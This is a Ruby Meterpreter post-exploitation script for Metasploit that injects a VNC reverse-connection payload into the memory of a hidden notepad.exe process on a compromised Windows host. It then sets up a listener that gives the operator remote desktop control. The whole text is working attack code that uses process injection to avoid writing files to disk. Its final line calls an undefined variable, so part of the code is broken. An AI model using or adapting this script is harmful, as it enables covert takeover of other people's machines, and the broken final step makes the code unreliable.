hhmatt

# $Id: vnc_mem.rb 12-17-2009 hdm $
#
# Meterpreter script for obtaining a quick VNC session
# Hybrid of vnc.rb and vnc_oneport.rb
# Utilizes memory functions so no file is created
# All code written by H.D. Moore (hdm)
# Edited by hhmatt
#

session = client

#
# Options
#
opts = Rex::Parser::Arguments.new(
    "-h"  => [ false,  "This help menu"],<br>
    "-r"  => [ true,  "The IP of the system running Metasploit listening for the connect back"],
    "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
#    "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
    "-e"  => [ true,    "The process to run and inject into (default:notepad.exe)"])

#
# Default parameters
#
runme    = "notepad.exe"
rhost    = Rex::Socket.source_address("1.2.3.4")
rport    = 4545
#autoconn = true

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
        case opt
        when "-h"
                print_line(opts.usage)
                return
        when "-r"
                rhost = val
        when "-p"
                rport = val.to_i
#       when "-D"
#               autoconn = false
        when "-e"
                runme = val
        end
end

#
# Create the agent EXE
#
print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})")
pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw  = pay.generate
exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
print_status("VNC stager executable #{exe.length} bytes long")

#
# Create a host process
#
pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => 'true'}).pid
print_status("Host process #{runme} has PID #{pid}")
note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
mem  = note.memory.allocate(1024*32)
print_status("Allocated memory at address #{"0x%.8x" % mem}")
print_status("Writing the VNC stager into memory...")
note.memory.write(mem, raw)

#
# Setup the multi/handler
#
        mul = client.framework.exploits.create("multi/handler")
        mul.datastore['PAYLOAD']   = "windows/vncinject/reverse_tcp"
        mul.datastore['LHOST']     = rhost
        mul.datastore['LPORT']     = rport
        mul.datastore['EXITFUNC']  = 'process'
        mul.datastore['ExitOnSession'] = true
        mul.datastore['DisableCourtesyShell'] = true
        mul.exploit_simple(
                'Payload'        => mul.datastore['PAYLOAD'],
                'RunAsJob'       => true)

#
# Execute the agent
#
print_status("Creating a new thread within #{runme} to run the VNC stager...")
note.thread.create(mem, 0)
print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})